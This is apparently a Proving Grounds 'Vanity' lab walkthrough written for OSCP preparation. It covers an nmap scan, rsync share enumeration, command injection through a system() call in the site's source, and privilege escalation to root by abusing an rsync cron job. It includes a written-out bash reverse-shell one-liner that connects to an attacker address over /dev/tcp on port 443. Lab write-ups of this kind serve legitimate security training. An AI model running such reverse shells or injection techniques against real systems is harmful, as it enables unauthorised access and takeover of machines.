Proving grounds:Vanity
Today we will take a look at Proving grounds: Vanity. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
| 256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
|_ 256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vanity Virus Scanner
|_http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open rsync (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- rsync (873)
Enumerate port 873
└─$ rsync -rdt rsync://192.168.54.234
source Web Source
backup Virus Samples Backup
Copy the shared folders.
└─$ rsync -rdt rsync://192.168.54.234/source .
Here we see the system function. We can use this to do command injection.
- web (80)
There is a download section on the site, let’s download and grab the request with burp.
Let’s do the injection command as we saw earlier.
Result BOOM
- Reverse (www-data)
Paste the payload to get the reverse shell.
echo "bash -i >& /dev/tcp/192.168.xx.xx/443 0>&1" | base64
Listen
- Privesc (rsync)
In Crontab, we see the command executed at a certain time, let’s see its content.
We can write and delete whatever we want to the uploads folder, but then the command is executed by rsync.
We see that this setting can be abused to achieve RCE.
prepare our payload
Listen:
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”